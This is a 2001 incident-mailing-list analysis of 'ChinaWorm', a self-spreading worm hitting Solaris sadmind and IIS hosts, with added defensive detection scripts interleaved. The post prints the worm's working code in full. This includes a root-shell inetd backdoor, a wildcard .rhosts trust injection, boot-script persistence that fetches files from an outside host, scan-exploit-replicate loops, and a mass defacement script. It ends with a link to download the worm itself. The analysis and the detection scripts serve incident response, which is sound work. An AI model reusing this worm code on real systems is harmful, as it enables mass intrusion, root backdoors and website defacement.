Security Incidents mailing list archives
Two-Headed Worm - ChinaWorm (analysis)
From: sheib <sheib () mbox digsys bg>
Date: Mon, 05 Nov 2001 10:06:29 +0200
--/ TWO-HEADED WORM - CHINAWORM \--
Since neither Bugtraq nor CERT has mentioned anything about it,
it appears that there is another worm spreading on the loose.
It is a new type of worm because it attacks two types of systems
simultaneously; that is where the "two-headed" name applies.
I will call it ChinaWorm since that is the name in the
index tree below. In fact, it looks much more like a combined worm.
Its creator appears to be using sysadmcn () yahoo com cn to
receive the results of his work.
CW scans class B and class C networks for hosts vulnerable to Sun Solaris'
sadmind vulnerability, as well as for vulnerable IIS hosts.
It lurks parasitically in the hosts it is able to break into.
Once it has built a list of new hosts, it tries to replicate itself to them.
I've seen it before and I see it now. Just decided to drop some
lines to make notice of it.
Many must have seen 111/tcp probes over their networks.
Nov 4 15:30:17 grind kernel: IN=ppp0 OUT= MAC= SRC=216.227.125.143 DST=x.y.z.p LEN=44 TOS=0x00 PREC=0x00 TTL=235 ID=47042 DF PROTO=TCP SPT=60014 DPT=111 WINDOW=8760 RES=0x00 SYN URGP=0
Nov 4 15:30:18 grind kernel: IN=ppp0 OUT= MAC= SRC=216.227.125.143 DST=x.y.z.p LEN=40 TOS=0x00 PREC=0x00 TTL=235 ID=47043 DF PROTO=TCP SPT=60014 DPT=111 WINDOW=8760 RES=0x00 RST URGP=0
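The two kernel log lines above are the footprint of a connect-and-drop port scan: a SYN to 111/tcp followed one second later by a RST from the same source port. The following is an added example, not from the post: a small sh/awk function that summarises netfilter log lines of this form per source address for one destination port, so that a sysadmin can see at a glance which hosts are sweeping the network for rpcbind. The log lines it works on are constructed for the example (the first two are the post's lines with the wrapped text rejoined and a documentation address as DST; the other two are made up).

```shell
#!/bin/sh
# Added example (not from the post): count SYN and RST packets per source
# address for one destination port in netfilter "kernel:" log lines.
# Usage: probes_to_port PORT < /var/log/messages
probes_to_port() {
    awk -v port="$1" '
    {
        src = ""; dpt = ""; syn = 0; rst = 0
        # netfilter logs are key=value tokens; the TCP flags are bare words
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^SRC=/) src = substr($i, 5)
            else if ($i ~ /^DPT=/) dpt = substr($i, 5)
            else if ($i == "SYN") syn = 1
            else if ($i == "RST") rst = 1
        }
        if (src == "" || dpt != port) next
        seen[src] = 1
        if (syn) s[src]++
        if (rst) r[src]++
    }
    END {
        # a source that both opens and resets on the same port is a scanner
        # that grabbed a banner (or simply confirmed the port is open) and left
        for (h in seen) printf "%s syn=%d rst=%d\n", h, s[h] + 0, r[h] + 0
    }' | sort
}

# Constructed sample log: the post's two lines (DST replaced by a
# documentation address) plus two made-up lines from other sources.
sample_log() {
    cat <<'EOF'
Nov 4 15:30:17 grind kernel: IN=ppp0 OUT= MAC= SRC=216.227.125.143 DST=192.0.2.7 LEN=44 TOS=0x00 PREC=0x00 TTL=235 ID=47042 DF PROTO=TCP SPT=60014 DPT=111 WINDOW=8760 RES=0x00 SYN URGP=0
Nov 4 15:30:18 grind kernel: IN=ppp0 OUT= MAC= SRC=216.227.125.143 DST=192.0.2.7 LEN=40 TOS=0x00 PREC=0x00 TTL=235 ID=47043 DF PROTO=TCP SPT=60014 DPT=111 WINDOW=8760 RES=0x00 RST URGP=0
Nov 4 15:31:02 grind kernel: IN=ppp0 OUT= MAC= SRC=198.51.100.23 DST=192.0.2.7 LEN=44 TOS=0x00 PREC=0x00 TTL=51 ID=1 DF PROTO=TCP SPT=40001 DPT=111 WINDOW=5840 RES=0x00 SYN URGP=0
Nov 4 15:31:09 grind kernel: IN=ppp0 OUT= MAC= SRC=203.0.113.4 DST=192.0.2.7 LEN=44 TOS=0x00 PREC=0x00 TTL=60 ID=2 DF PROTO=TCP SPT=40002 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0
EOF
}

# Which sources touched 111/tcp, and which of them also sent a reset
sample_log | probes_to_port 111
```

Run as `probes_to_port 111 < /var/log/messages` on a box whose firewall logs inbound SYNs; a source with a high syn count and a matching rst count across many of your addresses is sweeping for rpcbind the way grabbb does in the listings further down.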
The worm installs a primitive backdoor listening on 600/tcp on the
SunOS hosts it breaks into, so anyone is free to join.
A brief explanation of what was found, plus ``snapshots'', follows.
Some of the sources are published below; some are not, but they are available.
source host: 216.227.125.143
uname report:
SunOS jbod-lab 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-60
ps report:
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Oct 31 ? 0:04 sched
root 1 0 0 Oct 31 ? 0:18 /etc/init -r
root 2 0 0 Oct 31 ? 0:00 pageout
root 3 0 1 Oct 31 ? 41:00 fsflush
root 641 1 0 Oct 31 ? 0:00 /usr/lib/saf/sac -t 300
root 380 1 0 Oct 31 ? 0:00 /usr/sbin/rpcbind
root 644 641 0 Oct 31 ? 0:00 /usr/lib/saf/ttymon
root 463 1 0 Oct 31 ? 0:00 /usr/lib/lpsched
root 412 1 0 Oct 31 ? 0:00 /usr/lib/nfs/statd
root 484 1 0 Oct 31 ? 0:00 /usr/lib/sendmail -bd -q1h
root 433 1 0 Oct 31 ? 0:57 /usr/sbin/syslogd -n -z 14
root 453 1 0 Oct 31 ? 0:06 /usr/sbin/nscd
root 407 1 0 Oct 31 ? 0:05 /usr/sbin/inetd -s
root 382 1 0 Oct 31 ? 0:00 /usr/sbin/keyserv
root 414 1 0 Oct 31 ? 0:00 /usr/lib/nfs/lockd
root 429 1 0 Oct 31 ? 0:00 /usr/lib/autofs/automountd
root 444 1 0 Oct 31 ? 0:00 /usr/sbin/cron
root 494 1 0 Oct 31 ? 0:00 /usr/lib/utmpd
root 481 1 0 Oct 31 ? 0:00 /usr/lib/power/powerd
root 519 1 0 Oct 31 ? 0:04 /usr/lib/osa/bin/arraymon
root 530 1 0 Oct 31 ? 0:00 /usr/lib/osa/bin/rdaemon 24 156 root 64
root 8848 1 0 Nov 01 ? 0:03 /usr/local/sbin/sshd
root 585 1 0 Oct 31 ? 0:00 /usr/sbin/vold
root 564 530 0 Oct 31 ? 0:00 /usr/lib/osa/bin/rdaemon 24 156
root 619 1 0 Oct 31 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/snmp/conf
root 632 1 0 Oct 31 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 634 1 0 Oct 31 ? 0:00 /usr/lib/dmi/snmpXdmid -s jbod-lab
root 631 1 0 Oct 31 ? 0:00 /usr/lib/dmi/dmispd
root 642 1 0 Oct 31 console 0:00 /usr/lib/saf/ttymon -g -h -p jbod-lab console login: -T sun -d /dev/console -l
root 327 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 15620 1 0 02:02:05 ? 0:01 /usr/lib/osa/bin/parityck -aqf
root 14241 338 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a 109.121.177.1 -b 109.121.177.50 80
root 14231 335 0 06:48:30 ? 0:00 /dev/cuc/grabbb -t 3 -a 193.68.183.151 -b 193.68.183.200 111
root 14225 311 0 06:48:29 ? 0:00 /dev/cuc/grabbb -t 3 -a 164.183.177.1 -b 164.183.177.50 111
root 14229 326 0 06:48:30 ? 0:00 /dev/cuc/grabbb -t 3 -a 65.124.177.1 -b 65.124.177.50 111
root 347 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 338 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 14246 345 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a 14.194.177.1 -b 14.194.177.50 111
root 345 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 335 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 326 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 314 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 13248 310 0 06:44:24 ? 0:00 /bin/sleep 300
root 310 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/time.sh
root 29908 1 0 05:27:45 ? 0:00 /usr/sbin/inetd -s /tmp/.f
root 14235 347 0 06:48:31 ? 0:00 /dev/cuc/grabbb -t 3 -a 109.216.177.1 -b 109.216.177.50 80
root 14216 314 0 06:48:28 ? 0:00 /dev/cuc/grabbb -t 3 -a 18.214.177.1 -b 18.214.177.50 80
root 311 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/sadmin.sh
root 14237 327 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a 195.209.179.151 -b 195.209.179.200 80
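Two things in the ps listing above give the infection away without knowing any of the file names: programs and scripts being run out of /dev, where only device nodes belong, and a second inetd (PID 29908) started with its own configuration file instead of /etc/inetd.conf. The following is an added example, not from the post: a sh/awk triage function that reads `ps -ef` output and prints the PID, the reason and the command line of every process matching either pattern. The sample rows are taken from the listing above with their wrapped arguments rejoined; the short allowlist of /dev paths treated as ordinary arguments (/dev/null, /dev/console, ttys) is an assumption of the example.

```shell
#!/bin/sh
# Added example (not from the post): triage "ps -ef" output for executables
# living under /dev and for an inetd given a positional configuration file.
# Usage: ps -ef | ps_triage        -> lines of "PID REASON CMD"
ps_triage() {
    awk '
    # skip the ps header
    NR == 1 && $1 == "UID" { next }
    {
        # STIME is either "HH:MM:SS" (one field) or "Mon DD" (two fields),
        # so CMD begins at field 8 or field 9 respectively
        start = ($5 ~ /^[A-Z][a-z][a-z]$/) ? 9 : 8
        cmd = $start
        for (i = start + 1; i <= NF; i++) cmd = cmd " " $i
        reason = ""
        # the program, or the script handed to an interpreter, lives under /dev;
        # /dev/null, /dev/console and ttys are assumed to be benign arguments
        for (i = start; i <= start + 1 && i <= NF; i++)
            if ($i ~ /^\/dev\// && $i !~ /^\/dev\/(null|console|tty|pts)/)
                reason = "exec-under-dev"
        # inetd started with an explicit configuration file (Solaris: any
        # non-option argument) rather than the default /etc/inetd.conf
        if ($start ~ /inetd$/)
            for (i = start + 1; i <= NF; i++)
                if ($i !~ /^-/) reason = "inetd-config-file"
        if (reason != "") print $2, reason, cmd
    }'
}

# Constructed sample: rows copied from the ps listing in the post, with the
# wrapped argument lists rejoined onto one line each.
sample_ps() {
    cat <<'EOF'
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Oct 31 ? 0:04 sched
root 407 1 0 Oct 31 ? 0:05 /usr/sbin/inetd -s
root 327 1 0 05:34:23 ? 0:00 /bin/sh /dev/cuc/uniattack.sh
root 14241 338 0 06:48:32 ? 0:00 /dev/cuc/grabbb -t 3 -a 109.121.177.1 -b 109.121.177.50 80
root 13248 310 0 06:44:24 ? 0:00 /bin/sleep 300
root 29908 1 0 05:27:45 ? 0:00 /usr/sbin/inetd -s /tmp/.f
root 642 1 0 Oct 31 console 0:00 /usr/lib/saf/ttymon -g -h -p jbod-lab console login: -T sun -d /dev/console -l
EOF
}

sample_ps | ps_triage
```

The legitimate inetd (PID 407, `inetd -s` with no file argument) and the sleep child of time.sh are left alone; only the three rows a responder would actually want to look at come out. On a live Solaris host the same function runs as `ps -ef | ps_triage`.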
file index in /dev/cuc:
drwxr-xr-x 2 root bin 632 Apr 29 2001 ./
drwxr-xr-x 3 root bin 72 Nov 4 17:11 ../
-rwxr-xr-x 1 root bin 6556 Apr 26 2001 brute*
-rw-r--r-- 1 root bin 701440 May 8 23:31 chinaworm.tar
-rw-r--r-- 1 root bin 86 Apr 26 2001 cmd1.txt
-rw-r--r-- 1 root bin 655 Apr 29 2001 cmd2.txt
-rw-r--r-- 1 root root 349712 Apr 29 2001 core
-rwxr-xr-x 1 root bin 11828 Apr 25 2001 grabbb*
-rwxr-xr-x 1 root root 66164 Apr 29 2001 gzip*
-rw-r--r-- 1 root bin 413 Apr 26 2001 index.html
-rw-r--r-- 1 root root 349696 May 6 04:42 junk.tar
-rwxr-xr-x 1 root bin 28620 Apr 26 2001 nc*
-rwxr-xr-x 1 root bin 222608 May 7 21:01 pico*
-rw-r--r-- 1 root root 10 Apr 29 2001 pkgadd.txt
-rw-r--r-- 1 root bin 151 Apr 26 2001 ranip.pl
-rwxr-xr-x 1 root bin 1591 Apr 27 2001 sadmin.sh*
-rwxr-xr-x 1 root bin 14644 Apr 25 2001 sadmindex-sparc*
-rwxr-xr-x 1 root bin 217 Apr 26 2001 start.sh*
-rw-r--r-- 1 root bin 6387 May 24 00:48 test
-rwxr-xr-x 1 root bin 566 Apr 27 2001 time.sh*
-rw-r--r-- 1 root bin 350208 May 7 21:22 uni.tar
-rw-r--r-- 1 root bin 67798 Apr 26 2001 uniattack.pl
-rwxr-xr-x 1 root bin 645 Apr 26 2001 uniattack.sh*
-rwxr-xr-x 1 root root 136288 Apr 29 2001 wget*
brute - SPARC executable used to inject the following code into a Solaris box
vulnerable to the sadmind vulnerability [Bugtraq id n/a]:
echo 'pcserver stream tcp nowait root /bin/sh sh -i' > /tmp/.f;
/usr/sbin/inetd -s /tmp/.f; rm -f /tmp/.f;
The above binds a root shell on port 600/tcp (pcserver is the /etc/services
name for 600/tcp); the temporary inetd configuration is removed as soon as the
second inetd has read it.
cmd1.txt - commands used to trojan a shell service, using the rsh -l root 'sh -i'
tactic:
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
exit
cmd2.txt - extracts uni.tar and backdoors the system's init scripts;
further explanation below:
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit
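Between them, cmd1.txt and cmd2.txt leave a short, fixed list of traces on a compromised host: the wildcard "+ +" in root's .rhosts, the /dev/cuc tool directory (plus /dev/cub, which start.sh creates), the /tmp/.f inetd configuration, an S71rpc that starts /dev/cuc/start.sh, and the renamed original S71rpc, which cmd2.txt leaves behind as /etc/rc2.d/tmp2 and never deletes. The following is an added example, not from the post: a hypothetical sh check for exactly those traces. It takes an optional root prefix so it can be run against a mounted disk image as well as the live system, and it locates root's .rhosts the same way cmd1.txt does, from the home directory field in /etc/passwd. All paths are the ones the post shows; the function and message names are the example's own.

```shell
#!/bin/sh
# Added example (not from the post): look for the persistence changes made by
# cmd1.txt and cmd2.txt. Prints one "FINDING:" line per hit; exit status is 1
# if anything was found, 0 otherwise.
# Usage: chinaworm_check            (live root)
#        chinaworm_check /mnt/image (mounted image, paths are prefixed)
cw_report() {
    echo "FINDING: $1"
    CW_FOUND=1
}

chinaworm_check() {
    R="${1:-}"      # prefix for a mounted image; empty means the live root
    CW_FOUND=0

    # tool and work directories the worm keeps under /dev (uni.tar contents
    # and the /dev/cub work directory created by start.sh)
    for d in /dev/cuc /dev/cub; do
        [ -d "$R$d" ] && cw_report "directory $d exists"
    done

    # temporary inetd configuration that binds the shell on 600/tcp
    [ -e "$R/tmp/.f" ] && cw_report "/tmp/.f present"

    # wildcard trust written by cmd1.txt; root's home directory is taken from
    # passwd the same way cmd1.txt takes it
    home=/
    if [ -r "$R/etc/passwd" ]; then
        home=$(awk -F: '$1 == "root" { print $6; exit }' "$R/etc/passwd")
    fi
    rhosts="$R${home:-/}/.rhosts"
    if [ -f "$rhosts" ] && grep -q '^+[[:space:]]*+' "$rhosts"; then
        cw_report "wildcard entry in $rhosts"
    fi

    # rc script prepended by cmd2.txt, and the renamed original it leaves behind
    rc="$R/etc/rc2.d/S71rpc"
    if [ -f "$rc" ] && grep -q '/dev/cuc/start.sh' "$rc"; then
        cw_report "$rc starts /dev/cuc/start.sh"
    fi
    [ -f "$R/etc/rc2.d/tmp2" ] && cw_report "/etc/rc2.d/tmp2 present (renamed original S71rpc)"

    return $CW_FOUND
}

# When run as a script with a prefix argument, check that tree
if [ -n "${1-}" ]; then
    chinaworm_check "$1"
fi
```

The check is deliberately file-based and static, so it works on an image taken from a box that is no longer running the worm; for a live host, pair it with `ps -ef` and `netstat -an | grep '\.600 '` to catch the running scripts and the 600/tcp listener the post describes.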
core: ELF 32-bit MSB core file, SPARC, version 1, from 'sadmindex-sparc'
grabbb - network mapping utility
gzip, nc, pico & wget - common tools involved in the process of replication
index.html - obviously the creator of the worm will want to
deface the site's contents:
<HTML><HEAD>
<BODY bgColor=black><BR><BR><BR><BR><BR><BR>
<TABLE width="100%">
<TBODY>
<TR>
<TD>
<P align=center><FONT color=red size=7>fuck USA Government</FONT></P>
<TR>
<TD>
<P align=center><FONT color=red size=7>fuck PoizonBOx</FONT></P>
<TR>
<TD>
<P align=center><FONT color=red size=4>contact:sysadmcn () yahoo com cn
</FONT></P></TR></TBODY></TABLE></BODY></HTML>
ranip.pl - used to pick a random B class range (the first two octets) to scan:
use Getopt::Long;
$addr[0] = int(rand(254)+1);
$addr[1] = int(rand(255));
$b_ip = "$addr[0].$addr[1]";
print $b_ip;
sadmin.sh - the most important part of the worm: it reads the
``hacked'' list and tries to distribute itself using rcp tactics.
while true
do
    i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
    j=0
    while [ $j -lt 256 ];do
        /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
        j=`/bin/echo "$j+1"|/bin/bc`
    done
    iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
    for ip in $iplist;do
        /bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
        /bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
        if [ $? = 0 ];then
            /dev/cuc/brute 3 $ip >/dev/null 2>&1
            if [ $? = 0 ];then
                /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
                /bin/tar -cvf /tmp/uni.tar /dev/cuc
                /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
                if [ $? = 0 ];then
                    /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
                    /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
                    /bin/echo $ip >> /dev/cub/sadminhack.txt
                    /bin/rm -f /tmp/uni.tar
                fi
            else
                /dev/cuc/brute 4 $ip >/dev/null 2>&1
                if [ $? = 0 ];then
                    /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
                    /bin/tar -cvf /tmp/uni.tar /dev/cuc
                    /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
                    if [ $? = 0 ];then
                        /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
                        /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
                        /bin/echo $ip >> /dev/cub/sadminhack.txt
                        /bin/rm -f /tmp/uni.tar
                    fi
                fi
            fi
        fi
        /bin/rm -f /dev/cub/$i.rpc.txt
    done
    /bin/rm -f /dev/cub/$i.txt
done
sadmindex-sparc - the sadmind exploit, SPARC binary
start.sh - the initializing tool:
#!/bin/sh
if [ ! -d /dev/cub ]; then
    /bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
    /bin/nohup /dev/cuc/sadmin.sh &
    /bin/nohup /dev/cuc/uniattack.sh &
    i=`/bin/echo "$i+1"|/bin/bc`
done
test - output from sadmindex-sparc
time.sh - checks whether it's done and, if so, tries to overwrite all
index.html documents found on the host with the index document supplied.
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
    /bin/sleep 300
    /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
    /bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
    process=`/bin/awk '{print $2}' /dev/cub/tmp2`
    for p in $process;do
        /bin/grep $p /dev/cub/tmp3
        if [ $? = 0 ];then
            /bin/kill -9 $p
        fi
    done
    /bin/cp /dev/cub/tmp2 /dev/cub/tmp1
    i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
    if [ $i -gt 2000 ];then
        /bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
        /bin/rm -f /dev/cub/result.txt
    fi
done
uniattack.pl - Nimda-based Perl port of the well known IIS exploit;
performs all of the above at once.
I'm concerned about pasting it here. ~60K. A must see.
uniattack.sh - searches for vulnerable IIS hosts in the list created:
#!/bin/sh
while true
do
    i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
    j=0
    while [ $j -lt 256 ];do
        /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
        /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
        j=`/bin/echo "$j+1"|/bin/bc`
    done
    iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
    for ip in $iplist;do
        /usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
    done
    rm -f /dev/cub/$i.txt
done
* A Copy of ChinaWorm is available at http://212.7.192.4/cw.tgz *
/sh
First rule of public speaking.
First, tell 'em what you're goin' to tell 'em;
then tell 'em;
then tell 'em what you've tole 'em.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Current thread:
- Two-Headed Worm - ChinaWorm (analysis) sheib (Nov 05)
- Re: Two-Headed Worm - ChinaWorm (analysis) Holger van Lengerich (Nov 05)
- Re: Two-Headed Worm - ChinaWorm (analysis) Dave Dittrich (Nov 05)
